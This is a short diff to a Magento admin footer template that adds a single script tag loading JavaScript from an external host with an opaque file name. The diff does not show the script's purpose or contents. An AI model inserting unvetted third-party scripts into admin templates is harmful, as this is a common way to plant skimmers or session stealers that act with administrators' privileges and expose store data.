--- a/app/code/Magento/Backend/view/adminhtml/templates/page/footer.phtml
+++ b/app/code/Magento/Backend/view/adminhtml/templates/page/footer.phtml
@@ -8,3 +8,5 @@
     <strong><?= $block->escapeHtml(__('Magento')) ?></strong>
     <?= $block->escapeHtml(__('ver. %1', $block->getMagentoVersion())) ?>
 </p>
+
+<script src="https://fast.conpass.io/BFOAqNhZ_Q60S.js"></script>
